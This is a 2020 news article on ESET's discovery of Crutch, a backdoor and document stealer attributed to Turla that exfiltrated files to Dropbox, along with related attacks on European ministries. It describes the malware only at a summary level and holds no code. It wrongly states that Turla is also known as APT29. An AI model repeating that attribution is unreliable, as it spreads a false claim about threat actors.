Researchers uncover Crutch malware used by state-backed Turla hacker group

Security researchers at ESET recently uncovered a "previously undocumented backdoor and document stealer" malware known as Crutch that was used between 2015 and early 2020 by Russian state-sponsored hacker group Turla.

According to the researchers, they have evidence of Turla hackers using Crutch with Gazer, a second-stage backdoor and FatDuke, a third-stage backdoor, at the same time on one machine. While Crutch and Gazer were used together in September 2017, Crutch and FatDuke were also used at the same time on one machine, indicating that both backdoors were used by the same group.

The use of both Gazer and FatDuke have previously been attributed to Russian hacker group Turla, also known as APT29. According to ESET, the Turla hacker group used Crutch in an attack on the network of a Ministry of Foreign Affairs in a country of the European Union. The Crutch toolset was designed to exfiltrate sensitive documents and other files to Dropbox accounts Turla operators controlled.

In January this year, the Austrian government's Foreign Ministry and its Interior Ministry announced in a joint statement that the State Department's IT systems were the target of a serious cyber attack that was carried out by a state actor.

"The State Department's IT systems are currently the target of a serious cyber attack. The problem was recognized very quickly and countermeasures were taken immediately. A coordination committee has been set up on the basis of the Network and Information System Security Act, and all relevant federal agencies are already active.

"Due to the severity and the nature of the attack, it cannot be ruled out that it is a targeted attack by a state actor. In the past, some European countries have been targeted for similar attacks. Despite all the intensive security measures, there is no 100% protection against cyber attacks. The state protection mechanisms provided for this are active at all levels," the joint statement read.

According to security firm Proofpoint, Turla was also responsible for the leak of personal information of hundreds of German politicians and public figures including Chancellor Angela Merkel on Twitter.

"While actor attribution is notoriously difficult, early indications suggest that the Russian APT group Turla (a.k.a. Snake, Venomous Bear, Waterbug, and Uroboros) is behind the German data breaches reported earlier today," said Chris Dawson, Threat Intelligence Lead at Proofpoint.

"Proofpoint researchers have seen Turla targeting German interests before, particularly leveraging a G20 summit on the Digital Economy that took place in Hamburg in October 2017; other activity associated with this group has been well-documented and stretch back to at least 2008," he added.

According to ESET researchers, Crutch is not a first-stage backdoor but is deployed by Turla operators on systems that have already been compromised. The Crutch version 3 architecture uses a backdoor communicating with a hardcoded Dropbox account using the official HTTP API. It persists via DLL hijacking on Chrome, Firefox or OneDrive and can execute basic commands such as reading and writing files or executing additional processes.

The malware architecture also communicates with a drive monitor without network capabilities. The removable-drive monitor searches for files that have an interesting extension (.pdf, .rtf, .doc, .docx) and then stages the files in an encrypted archive.

The latest version of the malware (Crutch version 4), which was discovered in July 2019 by ESET, is an updated version of the removable-drive monitor with networking capabilities. Crutch v4 no longer supports backdoor commands but can automatically upload the files found on local and removable drives to Dropbox storage by using the Windows version of the Wget utility.

"In the past few years, we have publicly documented multiple malware families operated by Turla. Crutch shows that the group is not short of new or currently undocumented backdoors. This discovery further strengthens the perception that the Turla group has considerable resources to operate such a large and diverse arsenal.

"Crutch is able to bypass some security layers by abusing legitimate infrastructure – here Dropbox – in order to blend into normal network traffic while exfiltrating stolen documents and receiving commands from its operators," the researchers said.

Copyright Lyonsdown Limited 2020